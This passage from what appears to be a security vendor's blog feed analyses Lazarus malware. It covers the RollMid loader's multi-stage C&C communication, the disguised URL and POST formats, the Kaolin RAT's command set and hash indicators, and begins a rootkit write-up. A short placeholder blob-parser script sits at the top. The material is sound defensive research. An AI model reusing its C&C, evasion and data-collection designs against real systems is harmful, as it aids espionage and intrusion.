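# Constructed sample input; the contents are placeholders, not real malware.
SAMPLE_BLOB = build_binary_blob(
    loader=b"MZ" + b"\x90" * 14,   # stand-in for the RollMid loader
    first=b"\xaa" * 24,            # stand-in for FIRST_ENCRYPTED_DLL
    second=b"\xbb" * 16,           # stand-in for SECOND_ENCRYPTED_DLL
    config=b"\xcc" * 8,            # stand-in for CONFIGURATION_DATA
)


if __name__ == "__main__":
    parsed = parse_binary_blob(SAMPLE_BLOB)
    print("loader bytes:      ", len(parsed.rollmid_loader))
    print("first dll bytes:   ", len(parsed.first_encrypted_dll))
    print("second dll bytes:  ", len(parsed.second_encrypted_dll))
    print("config bytes:      ", len(parsed.configuration_data))
    print("key material hint: ", parsed.key_material_hint.hex())
```

A truncated blob (one whose sizes overrun the buffer) is rejected with <code>BlobFormatError</code> rather than silently yielding a short section.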
  1918.  
  1919.  
  1920. <p>The <code>RollMid</code> loader requires the <code>FIRST_DLL_BINARY</code> for proper communication with the C&amp;C server. However, before loading <code>FIRST_DLL_BINARY</code>, the <code>RollMid</code> loader must first decrypt the <code>FIRST_ENCRYPTED_DLL</code> section.&nbsp;</p>
  1921.  
  1922.  
  1923.  
  1924. <p>The decryption process applies the AES algorithm, beginning with the parsing of the decryption key alongside an initialization vector to use for AES decryption. Subsequently, a decompression algorithm is applied to further extract the decrypted content. Following this, the decrypted <code>FIRST_DLL_BINARY</code> is loaded into memory, and the <code>DllMain</code> function is invoked to initialize the networking library.&nbsp;</p>
  1925.  
  1926.  
  1927.  
  1928. <p>Unfortunately, as we were unable to obtain the binary blob, we didn’t get a chance to reverse engineer the <code>FIRST_DLL_BINARY</code>. This presents a limitation in our understanding, as the precise implementation details for the imported functions in the <code>RollMid</code> loader remain unknown. These imported functions include the following:&nbsp;</p>
  1929.  
  1930.  
  1931.  
  1932. <ul>
  1933. <li><code>SendDataFromUrl</code></li>
  1934.  
  1935.  
  1936.  
  1937. <li><code>GetImageFromUrl</code></li>
  1938.  
  1939.  
  1940.  
  1941. <li><code>GetHtmlFromUrl</code></li>
  1942.  
  1943.  
  1944.  
  1945. <li><code>curl_global_cleanup</code></li>
  1946.  
  1947.  
  1948.  
  1949. <li><code>curl_global_init</code></li>
  1950. </ul>
  1951.  
  1952.  
  1953.  
  1954. <p>After reviewing the exported functions by their names, it becomes apparent that these functions are likely tasked with facilitating communication with the C&amp;C server. <code>FIRST_DLL_BINARY</code> also exports other functions beyond these five, some of which will be mentioned later in this blog.&nbsp;&nbsp;</p>
  1955.  
  1956.  
  1957.  
  1958. <p>The names of these five imported functions imply that <code>FIRST_DLL_BINARY</code> is built upon the <a href="https://curl.se/libcurl/">curl library</a> (as can be seen by the names <code>curl_global_cleanup</code> and <code>curl_global_init</code>). In order to establish communication with the C&amp;C servers, the <code>RollMid</code> loader employs the imported functions, utilizing HTTP requests as its preferred method of communication.&nbsp;</p>
  1959.  
  1960.  
  1961.  
  1962. <p>The rationale behind opting for the curl library for sending HTTP requests may stem from various factors. One notable reason could be the efficiency gained by the attacker, who can save time and resources by leveraging the HTTP communication protocol. Additionally, the ease of use and seamless integration of the curl library into the code further support its selection.&nbsp;</p>
  1963.  
  1964.  
  1965.  
  1966. <p>Prior to initiating communication with the C&amp;C server, the malware is required to generate a dictionary filled with random words, as illustrated in Figure 4 below. Given the extensive size of the dictionary (which contains hundreds of entries), we have included only a partial screenshot for reference purposes. The subsequent sections of this blog will explore the role and application of this dictionary in the overall functionality of the malware.&nbsp;</p>
  1967.  
  1968.  
  1969. <div class="wp-block-image">
  1970. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="545" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/FillDictonary-1-545x1024.png" alt="" class="wp-image-8358" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/FillDictonary-1-545x1024.png 545w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/FillDictonary-1-160x300.png 160w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/FillDictonary-1.png 562w" sizes="(max-width: 545px) 100vw, 545px" /><figcaption class="wp-element-caption">Figure 4: Filling the main dictionary&nbsp;</figcaption></figure></div>
  1971.  
  1972.  
  1973. <p>To establish communication with the C&amp;C server, as illustrated in Figure 5, the malware must obtain the initial C&amp;C addresses from the <code>CONFIGURATION_DATA</code> section. Upon decrypting these addresses, the malware initiates communication with the first layer of the C&amp;C server through the <code>GetHtmlFromUrl</code> function, presumably using an HTTP GET request. The server responds with an HTML file containing the address of the second C&amp;C server layer. Subsequently, the malware engages in communication with the second layer, employing the imported <code>GetImageFromUrl</code> function. The function name implies this performs a GET request to retrieve an image.&nbsp;</p>
  1974.  
  1975.  
  1976.  
  1977. <p>In this scenario, the attackers employ steganography to conceal crucial data for use in the next execution phase. Regrettably, we were unable to ascertain the nature of the important data concealed within the image received from the second layer of the C&amp;C server.&nbsp;</p>
  1978.  
  1979.  
  1980. <div class="wp-block-image">
  1981. <figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="521" height="374" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/CC_communication.drawio.png" alt="" class="wp-image-8359" style="width:649px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/CC_communication.drawio.png 521w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/CC_communication.drawio-300x215.png 300w" sizes="(max-width: 521px) 100vw, 521px" /><figcaption class="wp-element-caption"><em>Figure 5: Communication with C&amp;C servers</em></figcaption></figure></div>
  1982.  
  1983.  
  1984. <p>We are aware that the concealed data within the image serves as a parameter for a function responsible for transmitting data to the third C&amp;C server. Through our analysis, we have determined that the acquired data from the image corresponds to another address of the third C&amp;C server.&nbsp; Communication with the third C&amp;C server is initiated with a POST request.&nbsp;&nbsp;</p>
  1985.  
  1986.  
  1987.  
  1988. <p>Malware authors strategically employ multiple C&amp;C servers as part of their operational tactics to achieve specific objectives. In this case, the primary goal is to obtain an additional data blob from the third C&amp;C server, as depicted in Figure 5, specifically in step 7. Furthermore, the use of different C&amp;C servers and diverse communication pathways adds an additional layer of complexity for security tools attempting to monitor such activities. This complexity makes tracking and identifying malicious activities more challenging, as compared to scenarios where a single C&amp;C server is employed.</p>
  1989.  
  1990.  
  1991.  
  1992. <p>The malware then constructs a URL, by creating the query string with GET parameters (name/value pairs). The parameter name consists of a randomly selected word from the previously created dictionary and the value is generated as a random string of two characters. The format is as follows:&nbsp;</p>
  1993.  
  1994.  
  1995.  
  1996. <p><code><em>"%addressOfThirdC&amp;C%?%RandomWordFromDictonary%=%RandomString%"</em>&nbsp;</code></p>
  1997.  
  1998.  
  1999.  
  2000. <p>The URL generation involves the selection of words from a generated dictionary, as opposed to entirely random strings. This deliberate choice aims to enhance the appearance and legitimacy of the URL. The words, carefully curated from the dictionary, contribute to the appearance of a clean and organized URL, resembling those commonly associated with authentic applications. Terms such as <code>"atype"</code>, <code>"User"</code> or <code>"type"</code> are not arbitrary but rather thoughtfully chosen words from the created dictionary. By utilizing real words, the intention is to create a semblance of authenticity, making the HTTP <code>POST</code> payload appear more structured and in line with typical application interactions.&nbsp;</p>
  2001.  
  2002.  
  2003.  
  2004. <p>Before dispatching the <code>POST</code> request to the third layer of the C&amp;C server, the request is populated with additional key-value tuples separated by the standard delimiters &#8220;?&#8221; and &#8220;=&#8221; between the key and value. In this scenario, it includes:&nbsp;</p>
  2005.  
  2006.  
  2007.  
  2008. <p><code>%<em>RandomWordFromDictonary</em>%=%sleep_state_in_minutes%?%size_of_configuration_data%</code></p>
  2009.  
  2010.  
  2011.  
  2012. <p>The data received from the third C&amp;C server is parsed. The parsed data may contain either an integer describing the sleep interval or a data blob. This data blob is encoded using the base64 algorithm. After decoding, the first 4 bytes of the data blob indicate the size of its first part, and the remainder represents the second part of the data blob.&nbsp;</p>
  2013.  
  2014.  
  2015.  
  2016. <p>The first part of the data blob is appended as an overlay to <code>SECOND_ENCRYPTED_DLL</code>, which was obtained from the binary blob. After successfully decrypting and decompressing&nbsp;<code>SECOND_ENCRYPTED_DLL</code>, which is a Remote Access Trojan (RAT) component, the process prepares it to be loaded into memory and executed with specific parameters.&nbsp;</p>
  2017.  
  2018.  
  2019.  
  2020. <p>The underlying motivation behind this maneuver remains shrouded in uncertainty. It appears that the attacker, by choosing this method, sought to inject a degree of sophistication or complexity into the process. However, from our perspective, this approach seems to border on overkill. We believe that a simpler method could have sufficed for passing the data blob to the <code>Kaolin</code> RAT.&nbsp;&nbsp;</p>
  2021.  
  2022.  
  2023.  
  2024. <p>The second part of the data blob, once decrypted and decompressed, is handed over to the <code>Kaolin</code> RAT component, while the <code>Kaolin</code> RAT is executed in memory. Notably, the decryption key and initialization vector for decrypting the second part of the data blob reside within its initial 32 bytes.&nbsp;&nbsp;</p>
  2025.  
  2026.  
  2027.  
  2028. <h2 class="wp-block-heading">Kaolin RAT</h2>
  2029.  
  2030.  
  2031.  
  2032. <p>A pivotal phase in orchestrating the attack involves the utilization of a Remote Access Trojan (RAT). As mentioned earlier, this <code>Kaolin</code> RAT is executed in memory and configured with specific parameters for proper functionality. It stands as a fully equipped tool, including file compression capabilities. &nbsp;</p>
  2033.  
  2034.  
  2035.  
  2036. <p>However, in our investigation, the <code>Kaolin</code> RAT does not mark the conclusion of the attack. In the previous blog post, we already introduced another significant component – the <a href="https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/" target="_blank" rel="noreferrer noopener">FudModule</a> rootkit. Thanks to our robust telemetry, we can confidently assert that this rootkit was loaded by the aforementioned <code>Kaolin</code> RAT, showcasing its capabilities to seamlessly integrate and deploy <code>FudModule</code>. This layered progression underscores the complexity and sophistication of the overall attack strategy.&nbsp;</p>
  2037.  
  2038.  
  2039.  
  2040. <p>One of the important steps is establishing secure communication with the RAT’s C&amp;C server, encrypted using the AES encryption algorithm. Despite the unavailability of the binary containing the communication functionalities (the RAT also relies on functions imported from <code>FIRST_DLL_BINARY</code> for networking), our understanding is informed by other components in the attack chain, allowing us to make certain assumptions about the communication method.&nbsp;</p>
  2041.  
  2042.  
  2043.  
  2044. <p>The <code>Kaolin</code> RAT is loaded with six arguments, among which a key one is the base address of the network module DLL binary, previously also used in the <code>RollMid</code> loader. Another argument includes the configuration data from the second part of the received data blob.&nbsp;</p>
  2045.  
  2046.  
  2047.  
  2048. <p>For proper execution, the <code>Kaolin</code>&nbsp;RAT needs to parse this configuration data, which includes parameters such as:&nbsp;</p>
  2049.  
  2050.  
  2051.  
  2052. <ul>
  2053. <li>Duration of the sleep interval.&nbsp;</li>
  2054.  
  2055.  
  2056.  
  2057. <li>A flag indicating whether to collect information about available disk drives.&nbsp;</li>
  2058.  
  2059.  
  2060.  
  2061. <li>A flag indicating whether to retrieve a list of active sessions on the remote desktop.&nbsp;</li>
  2062.  
  2063.  
  2064.  
  2065. <li>Addresses of additional C&amp;C servers.&nbsp;</li>
  2066. </ul>
  2067.  
  2068.  
  2069.  
  2070. <p>In addition, the <code>Kaolin</code> RAT must load specific functions from <code>FIRST_DLL_BINARY</code>, namely:&nbsp;</p>
  2071.  
  2072.  
  2073.  
  2074. <ul>
  2075. <li><code>SendDataFromURL</code></li>
  2076.  
  2077.  
  2078.  
  2079. <li><code>ZipFolder</code></li>
  2080.  
  2081.  
  2082.  
  2083. <li><code>UnzipStr</code></li>
  2084.  
  2085.  
  2086.  
  2087. <li><code>curl_global_cleanup</code></li>
  2088.  
  2089.  
  2090.  
  2091. <li><code>curl_global_init</code></li>
  2092. </ul>
  2093.  
  2094.  
  2095.  
  2096. <p>Although the exact method by which the <code>Kaolin</code> RAT sends gathered information to the C&amp;C server is not precisely known, the presence of exported functions like <code>curl_global_cleanup</code> and <code>curl_global_init</code> suggests that the sending process again involves API calls from the curl library.&nbsp;</p>
  2097.  
  2098.  
  2099.  
  2100. <p>For establishing communication, the <code>Kaolin</code> RAT begins by sending a <code>POST</code> request to the C&amp;C server. In this first <code>POST</code> request, the malware constructs a URL containing the address of the C&amp;C server. This URL generation algorithm is very similar to the one used in the <code>RollMid</code> loader. To the C&amp;C address, the <code>Kaolin</code> RAT appends a randomly chosen word from the previously created dictionary (the same one as in the <code>RollMid</code> loader) along with a randomly generated string. The format of the URL is as follows:&nbsp;</p>
  2101.  
  2102.  
  2103.  
  2104. <p><code><em>"%addressOfC&amp;Cserver%?%RandomWordFromDictonary%=%RandomString%"</em>&nbsp;</code></p>
  2105.  
  2106.  
  2107.  
  2108. <p>The malware further populates the content of the <code>POST</code> request, utilizing the default <code>"application/x-www-form-urlencoded"</code> content type. The content of the <code>POST</code> request is subject to AES encryption and subsequently encoded with base64.&nbsp;</p>
  2109.  
  2110.  
  2111.  
  2112. <p>The encrypted content (<code><em>EncryptedContent</em></code>), which is appended to the key-value tuples (see the form below), includes the following data:&nbsp;</p>
  2113.  
  2114.  
  2115.  
  2116. <ul>
  2117. <li>Installation path of the <code>RollFling</code> loader and path to the binary blob&nbsp;</li>
  2118.  
  2119.  
  2120.  
  2121. <li>Data from the registry key <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Iconservice</code>&nbsp;</li>
  2122.  
  2123.  
  2124.  
  2125. <li><code>Kaolin</code> RAT process ID&nbsp;</li>
  2126.  
  2127.  
  2128.  
  2129. <li>Product name and build number of the operating system.&nbsp;</li>
  2130.  
  2131.  
  2132.  
  2133. <li>Addresses of C&amp;C servers.&nbsp;</li>
  2134.  
  2135.  
  2136.  
  2137. <li>Computer name&nbsp;</li>
  2138.  
  2139.  
  2140.  
  2141. <li>Current directory&nbsp;</li>
  2142. </ul>
  2143.  
  2144.  
  2145.  
  2146. <p>In the <code>POST</code> request with the encrypted content, the malware appends information about the generated key and initialization vector necessary for decrypting data on the backend. This is achieved by creating key-value tuples, separated by &#8220;&amp;&#8221; and &#8220;=&#8221; between the key and value. In this case, it takes the following form:&nbsp;</p>
  2147.  
  2148.  
  2149.  
  2150. <p><code><em>%RandomWordFromDictonary%=%TEMP_DATA%&amp;%RandomWordFromDictonary%=%IV%%KEY%&amp;%RandomWordFromDictonary%=%EncryptedContent%&amp;%RandomWordFromDictonary%=%EncryptedHostNameAndIPAddr%</em>&nbsp;</code></p>
  2151.  
  2152.  
  2153.  
  2154. <p>Upon successfully establishing communication with the C&amp;C server, the <code>Kaolin</code> RAT becomes prepared to receive commands. The received data is encrypted with the aforementioned generated key and initialization vector and requires decryption and parsing to execute a specific command within the RAT.&nbsp;</p>
  2155.  
  2156.  
  2157.  
  2158. <p>When the command has been processed, the <code>Kaolin</code> RAT relays the results back to the C&amp;C server, encrypted with the same AES key and IV. This encrypted message may include an error message, collected information, and the outcome of the executed function.&nbsp;</p>
  2159.  
  2160.  
  2161.  
  2162. <p>The <code>Kaolin</code> RAT has the capability to execute a variety of commands, including:&nbsp;</p>
  2163.  
  2164.  
  2165.  
  2166. <ul>
  2167. <li>Updating the duration of the sleep interval.&nbsp;</li>
  2168.  
  2169.  
  2170.  
  2171. <li>Listing files in a folder and gathering information about available disks.&nbsp;</li>
  2172.  
  2173.  
  2174.  
  2175. <li>Updating, modifying, or deleting files.&nbsp;</li>
  2176.  
  2177.  
  2178.  
  2179. <li>Changing a file’s last write timestamp.&nbsp;</li>
  2180.  
  2181.  
  2182.  
  2183. <li>Listing currently active processes and their associated modules.&nbsp;</li>
  2184.  
  2185.  
  2186.  
  2187. <li>Creating or terminating processes.&nbsp;</li>
  2188.  
  2189.  
  2190.  
  2191. <li>Executing commands using the command line.&nbsp;</li>
  2192.  
  2193.  
  2194.  
  2195. <li>Updating or retrieving the internal configuration.&nbsp;</li>
  2196.  
  2197.  
  2198.  
  2199. <li>Uploading a file to the C&amp;C server.&nbsp;</li>
  2200.  
  2201.  
  2202.  
  2203. <li>Connecting to an arbitrary host.&nbsp;</li>
  2204.  
  2205.  
  2206.  
  2207. <li>Compressing files.&nbsp;</li>
  2208.  
  2209.  
  2210.  
  2211. <li>Downloading a DLL file from the C&amp;C server and loading it in memory, potentially executing one of the following exported functions:&nbsp;
  2212. <ul>
  2213. <li><code>_DoMyFunc</code></li>
  2214.  
  2215.  
  2216.  
  2217. <li><code>_DoMyFunc2</code></li>
  2218.  
  2219.  
  2220.  
  2221. <li><code>_DoMyThread</code> (executes a thread)</li>
  2222.  
  2223.  
  2224.  
  2225. <li><code>_DoMyCommandWork</code></li>
  2226. </ul>
  2227. </li>
  2228.  
  2229.  
  2230.  
  2231. <li>Setting the current directory.</li>
  2232. </ul>
  2233.  
  2234.  
  2235.  
  2236. <h2 class="wp-block-heading">Conclusion</h2>
  2237.  
  2238.  
  2239.  
  2240. <p>Our investigation has revealed that the Lazarus group targeted individuals through fabricated job offers and employed a sophisticated toolset to achieve better persistence while bypassing security products. Thanks to our robust telemetry, we were able to uncover almost the entire attack chain, thoroughly analyzing each stage. The Lazarus group&#8217;s level of technical sophistication was surprising and their approach to engaging with victims was equally troubling.&nbsp;It is evident that they invested significant resources in developing such a complex attack chain. What is certain is that Lazarus had to innovate continuously and allocate enormous resources to research various aspects of Windows mitigations and security products. Their ability to adapt and evolve poses a significant challenge to cybersecurity efforts.&nbsp;</p>
  2241.  
  2242.  
  2243.  
  2244. <h2 class="wp-block-heading">Indicators of Compromise (IoCs)&nbsp;</h2>
  2245.  
  2246.  
  2247.  
  2248. <p>ISO<br>b8a4c1792ce2ec15611932437a4a1a7e43b7c3783870afebf6eae043bcfade30 </p>
  2249.  
  2250.  
  2251.  
  2252. <p>RollFling<br>a3fe80540363ee2f1216ec3d01209d7c517f6e749004c91901494fb94852332b </p>
  2253.  
  2254.  
  2255.  
  2256. <p>NLS files<br>01ca7070bbe4bfa6254886f8599d6ce9537bafcbab6663f1f41bfc43f2ee370e<br>7248d66dea78a73b9b80b528d7e9f53bae7a77bad974ededeeb16c33b14b9c56 </p>
  2257.  
  2258.  
  2259.  
  2260. <p>RollSling<br>e68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f<br>f47f78b5eef672e8e1bd0f26fb4aa699dec113d6225e2fcbd57129d6dada7def </p>
  2261.  
  2262.  
  2263.  
  2264. <p>RollMid<br>9a4bc647c09775ed633c134643d18a0be8f37c21afa3c0f8adf41e038695643e </p>
  2265.  
  2266.  
  2267.  
  2268. <p>Kaolin RAT<br>a75399f9492a8d2683d4406fa3e1320e84010b3affdff0b8f2444ac33ce3e690 </p>
  2269. <p>The post <a href="https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/">From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  2270. ]]></content:encoded>
  2271. </item>
  2272. <item>
  2273. <title>Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day</title>
  2274. <link>https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day</link>
  2275. <dc:creator><![CDATA[Jan Vojtěšek]]></dc:creator>
  2276. <pubDate>Wed, 28 Feb 2024 13:14:50 +0000</pubDate>
  2277. <category><![CDATA[PC]]></category>
  2278. <category><![CDATA[BYOVD]]></category>
  2279. <category><![CDATA[CVE-2024-21338]]></category>
  2280. <category><![CDATA[exploit]]></category>
  2281. <category><![CDATA[FudModule]]></category>
  2282. <category><![CDATA[kernel]]></category>
  2283. <category><![CDATA[Lazarus]]></category>
  2284. <category><![CDATA[rootkit]]></category>
  2285. <category><![CDATA[zero-day]]></category>
  2286. <guid isPermaLink="false">https://decoded.avast.io/?p=8182</guid>
  2287.  
  2288. <description><![CDATA[<p>The Lazarus Group is back with an upgraded variant of their FudModule rootkit, this time enabled by a zero-day admin-to-kernel vulnerability for CVE-2024-21338. Read this blog for a detailed analysis of this rootkit variant and learn more about several new techniques, including a handle table entry manipulation technique that directly targets Microsoft Defender, CrowdStrike Falcon, and HitmanPro.</p>
  2289. <p>The post <a href="https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/">Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  2290. ]]></description>
  2291. <content:encoded><![CDATA[
  2292. <h2 class="wp-block-heading">Key Points</h2>
  2293.  
  2294.  
  2295.  
  2296. <ul>
  2297. <li>Avast discovered an in-the-wild admin-to-kernel exploit for a previously unknown zero-day vulnerability in the appid.sys AppLocker driver.&nbsp;</li>
  2298.  
  2299.  
  2300.  
  2301. <li>Thanks to Avast’s prompt report, Microsoft addressed this vulnerability as <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338" target="_blank" rel="noreferrer noopener">CVE-2024-21338</a> in the February Patch Tuesday update.&nbsp;</li>
  2302.  
  2303.  
  2304.  
  2305. <li>The exploitation activity was orchestrated by the notorious Lazarus Group, with the end goal of establishing a kernel read/write primitive.&nbsp;</li>
  2306.  
  2307.  
  2308.  
  2309. <li>This primitive enabled Lazarus to perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit, a previous version of which was analyzed by <a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf" target="_blank" rel="noreferrer noopener">ESET</a> and <a href="https://download.ahnlab.com/global/brochure/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD.pdf" target="_blank" rel="noreferrer noopener">AhnLab</a>.&nbsp;</li>
  2310.  
  2311.  
  2312.  
  2313. <li>After completely reverse engineering this updated rootkit variant, Avast identified substantial advancements in terms of both functionality and stealth, with four new – and three updated – rootkit techniques.&nbsp;</li>
  2314.  
  2315.  
  2316.  
  2317. <li>In a key advancement, the rootkit now employs a new handle table entry manipulation technique in an attempt to suspend PPL (Protected Process Light) protected processes associated with Microsoft Defender, CrowdStrike Falcon, and HitmanPro.&nbsp;</li>
  2318.  
  2319.  
  2320.  
  2321. <li>Another significant step up is exploiting the zero-day vulnerability, where Lazarus previously utilized much noisier BYOVD (Bring Your Own Vulnerable Driver) techniques to cross the admin-to-kernel boundary.&nbsp;</li>
  2322.  
  2323.  
  2324.  
  2325. <li>Avast’s investigation also recovered large parts of the infection chain leading up to the deployment of the rootkit, resulting in the discovery of a new RAT (Remote Access Trojan) attributed to Lazarus.&nbsp;</li>
  2326.  
  2327.  
  2328.  
  2329. <li>Technical details concerning the RAT and the initial infection vector will be published in a follow-up blog post, scheduled for release along with our <a href="https://www.blackhat.com/asia-24/briefings/schedule/#from-byovd-to-a--day-unveiling-advanced-exploits-in-cyber-recruiting-scams-37786" target="_blank" rel="noreferrer noopener">Black Hat Asia 2024 briefing</a>.&nbsp;</li>
  2330. </ul>
  2331.  
  2332.  
  2333.  
  2334. <h2 class="wp-block-heading">Introduction&nbsp;</h2>
  2335.  
  2336.  
  2337.  
  2338. <p>When it comes to Windows security, there is a thin line between admin and kernel. Microsoft’s <a href="https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria" target="_blank" rel="noreferrer noopener">security servicing criteria</a> have long asserted that “[a]dministrator-to-kernel is not a security boundary”, meaning that Microsoft reserves the right to patch admin-to-kernel vulnerabilities at its own discretion. As a result, the Windows security model does not guarantee that it will prevent an admin-level attacker from directly accessing the kernel. This isn’t just a theoretical concern. In practice, attackers with admin privileges <a href="https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/#:~:text=Known%20usage%20in%20the%20wild" target="_blank" rel="noreferrer noopener">frequently</a> achieve kernel-level access by exploiting known vulnerable drivers, in a technique called <a href="https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/" target="_blank" rel="noreferrer noopener">BYOVD</a> (Bring Your Own Vulnerable Driver).&nbsp;</p>
  2339.  
  2340.  
  2341.  
  2342. <p>Microsoft hasn’t given up on securing the admin-to-kernel boundary though. Quite the opposite, it has made a great deal of progress in making this boundary harder to cross. Defense-in-depth protections, such as <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/driver-signing" target="_blank" rel="noreferrer noopener">DSE</a> (Driver Signature Enforcement) or <a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-hvci-enablement" target="_blank" rel="noreferrer noopener">HVCI</a> (Hypervisor-Protected Code Integrity), have made it increasingly difficult for attackers to execute custom code in the kernel, forcing most to resort to data-only attacks (where they achieve their malicious objectives solely by reading and writing kernel memory). Other defenses, such as <a href="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/microsoft-recommended-driver-block-rules" target="_blank" rel="noreferrer noopener">driver blocklisting</a>, are pushing attackers to move to exploiting less-known vulnerable drivers, resulting in an increase in attack complexity. Although these defenses haven’t yet reached the point where we can officially call admin-to-kernel a security boundary (BYOVD attacks are still feasible, so calling it one would just mislead users into a false sense of security), they clearly represent steps in the right direction.&nbsp;</p>
  2343.  
  2344.  
  2345.  
  2346. <p>From the attacker’s perspective, crossing from admin to kernel opens a whole new realm of <a href="https://github.com/wavestone-cdt/EDRSandblast" target="_blank" rel="noreferrer noopener">possibilities</a>. With kernel-level access, an attacker might disrupt security software, conceal indicators of infection (including files, network activity, processes, etc.), disable kernel-mode telemetry, turn off mitigations, and more. Additionally, as the security of <a href="https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-" target="_blank" rel="noreferrer noopener">PPL</a> (Protected Process Light) relies on the admin-to-kernel boundary, our hypothetical attacker also gains the ability to tamper with protected processes or add protection to an arbitrary process. This can be especially powerful if lsass is <a href="https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection" target="_blank" rel="noreferrer noopener">protected with RunAsPPL</a> as bypassing PPL could enable the attacker to dump otherwise unreachable credentials.&nbsp;&nbsp;</p>
  2347.  
  2348.  
  2349.  
  2350. <p>For more specific examples of what an attacker might want to achieve with kernel-level access, keep reading this blog – in the <a href="#techniques">latter half</a>, we will dive into all the techniques implemented in the FudModule rootkit.&nbsp;</p>
  2351.  
  2352.  
  2353.  
  2354. <h5 class="wp-block-heading">Living Off the Land: Vulnerable Drivers Edition&nbsp;</h5>
  2355.  
  2356.  
  2357.  
  2358. <p>With a seemingly growing number of attackers seeking to abuse some of the previously mentioned kernel capabilities, defenders have no choice but to hunt heavily for driver exploits. Consequently, attackers wishing to target well-defended networks must also step up their game if they wish to avoid detection. We can broadly break down admin-to-kernel driver exploits into three categories, each representing a trade-off between attack difficulty and stealth.&nbsp;</p>
  2359.  
  2360.  
  2361.  
  2362. <h6 class="wp-block-heading"><strong>N-Day BYOVD Exploits</strong>&nbsp;</h6>
  2363.  
  2364.  
  2365.  
  2366. <p>In the simplest case, an attacker can leverage BYOVD to exploit a publicly known n-day vulnerability. This is very easy to pull off, as there are plenty of public proof-of-concept exploits for various vulnerabilities. However, it’s also relatively straightforward to detect since the attacker must first drop a known vulnerable driver to the file system and then load it into the kernel, resulting in two great detection opportunities. What’s more, some systems may have Microsoft’s <a href="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/microsoft-recommended-driver-block-rules#microsoft-vulnerable-driver-blocklist" target="_blank" rel="noreferrer noopener">vulnerable driver blocklist</a> enabled, which would block some of the most common vulnerable drivers from loading. <a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf" target="_blank" rel="noreferrer noopener">Previous</a> <a href="https://download.ahnlab.com/global/brochure/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD.pdf" target="_blank" rel="noreferrer noopener">versions</a> of the FudModule rootkit could be placed in this category, initially exploiting a known vulnerability in <a href="https://www.virustotal.com/gui/file/0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5/detection" target="_blank" rel="noreferrer noopener">dbutil_2_3.sys</a> and then moving on to targeting <a href="https://www.virustotal.com/gui/file/175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347" target="_blank" rel="noreferrer noopener">ene.sys</a> in later versions.&nbsp;</p>
  2367.  
  2368.  
  2369.  
  2370. <h6 class="wp-block-heading"><strong>Zero-Day BYOVD Exploits</strong>&nbsp;</h6>
  2371.  
  2372.  
  2373.  
  2374. <p>In more sophisticated scenarios, an attacker would use BYOVD to exploit a zero-day vulnerability within a signed third-party driver. Naturally, this requires the attacker to first discover such a zero-day vulnerability, which might initially seem like a daunting task. However, note that any exploitable vulnerability in any signed driver will do, and there is unfortunately no shortage of low-quality third-party drivers. Therefore, the difficulty level of discovering such a vulnerability might not be as high as it would initially seem. It might suffice to scan a collection of drivers for known vulnerability patterns, as demonstrated by Carbon Black researchers who recently used bulk static analysis to <a href="https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html" target="_blank" rel="noreferrer noopener">uncover</a> 34 unique vulnerabilities across more than 200 signed drivers. Such zero-day BYOVD attacks are notably stealthier than n-day attacks since defenders can no longer rely on hashes of known vulnerable drivers for detection. However, some detection opportunities still remain, as loading a random driver represents a suspicious event that might warrant deeper investigation. For an example of an attack belonging to this category, consider the spyware vendor Candiru, which we <a href="https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/" target="_blank" rel="noreferrer noopener">caught</a> exploiting a zero-day vulnerability in <a 